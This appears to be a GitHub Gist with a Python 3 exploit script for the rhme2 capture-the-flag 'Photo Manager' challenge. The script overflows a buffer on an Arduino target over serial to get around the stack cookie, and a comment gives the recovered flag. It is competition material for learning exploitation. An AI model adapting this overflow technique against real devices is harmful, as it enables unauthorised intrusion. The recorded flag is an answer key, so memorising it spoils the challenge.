Skip to content

Instantly share code, notes, and snippets.

@53845714nF
Last active February 17, 2024 18:16
Show Gist options
  • Save 53845714nF/7ad4c6eb0c38aae9a725e54859f1b8f2 to your computer and use it in GitHub Desktop.
Save 53845714nF/7ad4c6eb0c38aae9a725e54859f1b8f2 to your computer and use it in GitHub Desktop.
Fast exploit for the rhme2 CTF. For the challenge Photo Manager. Written in Python3. Breaks a a stack cookie.
#!/usr/bin/env python3
import serial
import time
try:
arduino = serial.Serial('/dev/ttyUSB0', 19200, timeout=0.1)
except:
print('Port not found')
def read_until(until):
arduino_data = ''
while until not in arduino_data:
arduino_data += str(arduino.readline())
return arduino_data
# read the used memory
read_until('[2] Memory management')
arduino.write(str.encode('2\r'))
used_memory = read_until('Memory space used:').split(' ')[7]
read_until('[2] Memory management')
arduino.write(str.encode('1\r'))
read_until('[A-Z/a-z/0-9]')
arduino.write(str.encode('A' * (4096 - int(used_memory) - 8) + chr(4088 - int(used_memory))))
arduino.write(b"\xff")
arduino.write(str.encode('\r'))
print(read_until('[2] Memory management'))
# Flage shows with the keyword: FLAG
# In my case: FLAG:D1d_y0u_sm4sh_my_stack_bro?
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment